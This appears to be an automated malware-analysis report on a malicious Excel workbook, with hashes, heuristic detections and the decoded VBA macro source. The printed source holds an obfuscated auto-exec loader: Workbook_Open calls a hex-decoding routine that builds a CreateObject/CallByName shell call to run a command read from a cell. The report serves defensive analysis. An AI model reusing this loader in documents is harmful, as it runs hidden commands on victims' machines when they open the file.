Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ebd7d3f081a5bed0…

MALICIOUS

Office (OLE)

225.0 KB Created: 2018-09-13 12:28:47 Authoring application: Microsoft Excel First seen: 2019-06-27
MD5: 5ac1878fa93f27f6f246a3e950f674d7 SHA-1: 4d08a2ac707015c722fc7991c81be88677e22002 SHA-256: ebd7d3f081a5bed0be2541caf1bed54f5b3ddba27549613538d03fa8073c54a4
320 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The file contains heavily obfuscated VBA macros, including a Workbook_Open event that triggers an auto-exec loader. This loader uses CreateObject and CallByName to execute code, likely to download and run a second-stage payload. The presence of XLM macros and the ClamAV detection signature further indicate malicious intent.

Heuristics 8

  • ClamAV: Doc.Malware.Valyria-6691358-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-6691358-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 228 bytes
SHA-256: 962aaf1d57f0a7207e98bd37b3a4cfa339dc6a87bd287090a5d69186204feb4a
Preview script
First 1,000 lines of the extracted script
' 0085     12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  Top
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2398 bytes
SHA-256: 529c7e5fa01b57cf0d23ac639b648828a6c1cd71fe608b21805de06ff66ef476
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Sub WBR()
Dim Count1Criteria As Variant
Dim Count3Criteria As Variant
Dim test As Variant
Dim wf As WorksheetFunction
Set wf = Application.WorksheetFunction

Filter1InSummary = Array(Array("AE4", "Latency", "O:O", "Pass"), _
                         Array("AE51", "TT", "G:G", "Yes"), _
                         Array("AE52", "TT", "G:G", "No"), _
                         Array("AE61", "Reactive", "R:R", "Item"))

Filter3InSummary = Array(Array("AE43", "TT", "I:I", "<>Duplicate TT", _
                                             "G:G", "<>Not Tested", _
                                             "U:U", "Item"))
For Each test In Filter3InSummary
    With Worksheets(test(1))
        Range(test(0)) = wf.CountIfs(.Range(test(2)), test(3), _
                                     .Range(test(4)), test(5), _
                                     .Range(test(6)), test(7))
    End With
    Next
Sub Workbook_Open()
Application.Run "ThisWorkbook.XXLNKPCN_"
End Sub
Private Sub XXLNKPCN_()
CallByName CreateObject(N_("726E7E8D848B8F496E83808787")), N_("6D9089"), VbMethod, N_(ThisWorkbook.Sheets("Tope").Range("G135").Value), 0, True
End Sub

Sub testme()

Dim myResult As Variant

myResult = "Error!"
With ActiveSheet
If IsNumeric(.Cells(4, 4).Value) Then
If IsNumeric(.Cells(5, 4).Value) Then
If .Cells(5, 4).Value <> 0 Then
myResult = .Cells(4, 4).Value / .Cells(5, 4).Value / 100
End If
End If
End If
End With

MsgBox myResult
If IsNumeric(myResult) Then
MsgBox Format(myResult, "0.00%")
End If
End Sub
Private Function N_(ByVal OOA_ As String)
Dim RTA_ As String: Dim TN_ As Long: For TN_ = 1 To Len(OOA_) Step 2: RTA_ = RTA_ & Chr(Val(Chr(Val(Chr(51) & Chr(56))) & Chr(Val(Chr(55) & Chr(50))) & Mid(OOA_, TN_, 2)) - 27): Next: N_ = RTA_
End Function
Sub dural()
    Dim r1 As Range, r2 As Range, r3 As Range

    Set r1 = Range("AE43")
    Set r2 = Range("AE51")
    Set r3 = Range("AE53")
    If r1.Value <> 0 Then
        r3.Value = r2.Value / r1.Value
    End If
    r3.NumberFormat = "00.0%"
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.